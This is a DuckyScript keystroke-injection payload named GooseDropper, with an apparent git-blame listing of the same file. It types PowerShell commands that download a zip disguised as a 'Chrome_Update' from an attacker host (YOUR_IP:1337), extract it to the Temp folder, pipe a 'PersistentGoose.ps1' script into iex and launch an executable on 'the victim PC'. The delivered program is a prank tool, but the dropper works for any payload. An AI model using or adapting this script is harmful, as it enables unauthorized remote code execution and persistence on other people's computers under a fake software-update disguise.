Duckyscripts/GooseDropper/GooseDropper.txt

REM TITLE GooseDropper
REM AUTHOR Fr3ki
REM DESCRIPTION Grab the Desktop Goose executable from an attacker machine and run it on the victim PC
DELAY 500
GUI r
DELAY 500
STRING powershell wget YOUR_IP:1337/Chrome_Update.zip -OutFile $ENV:Temp/Update.zip
ENTER
DELAY 8000
GUI r
DELAY 500
STRING powershell Expand-Archive $ENV:Temp\Update.zip -DestinationPath $ENV:Temp\Chrome_Update
ENTER
DELAY 3000
GUI r
DELAY 500
STRING powershell gc $env:Temp\Chrome_Update\Update\PersistentGoose.ps1 | iex
ENTER
DELAY 1000
GUI r
DELAY 500
STRING %Temp%\Chrome_Update\Update\GooseDesktop.exe
ENTER
Hello World 2023-10-29 01:03:44 -06:00			`REM TITLE GooseDropper`
			`REM AUTHOR Fr3ki`
			`REM DESCRIPTION Grab the Desktop Goose executable from an attacker machine and run it on the victim PC`
			`DELAY 500`
			`GUI r`
			`DELAY 500`
Goose Dropper v2.0 bugfix 2023-10-31 15:29:10 -06:00			`STRING powershell wget YOUR_IP:1337/Chrome_Update.zip -OutFile $ENV:Temp/Update.zip`
Hello World 2023-10-29 01:03:44 -06:00			`ENTER`
Dropper v2.0 2023-10-31 15:10:53 -06:00			`DELAY 8000`
Hello World 2023-10-29 01:03:44 -06:00			`GUI r`
			`DELAY 500`
Goose Dropper v2.0 bugfix 2023-10-31 15:29:10 -06:00			`STRING powershell Expand-Archive $ENV:Temp\Update.zip -DestinationPath $ENV:Temp\Chrome_Update`
Hello World 2023-10-29 01:03:44 -06:00			`ENTER`
			`DELAY 3000`
			`GUI r`
			`DELAY 500`
Dropper v2.0 2023-10-31 15:10:53 -06:00			`STRING powershell gc $env:Temp\Chrome_Update\Update\PersistentGoose.ps1 \| iex`
			`ENTER`
			`DELAY 1000`
			`GUI r`
			`DELAY 500`
Hello World 2023-10-29 01:03:44 -06:00			`STRING %Temp%\Chrome_Update\Update\GooseDesktop.exe`
			`ENTER`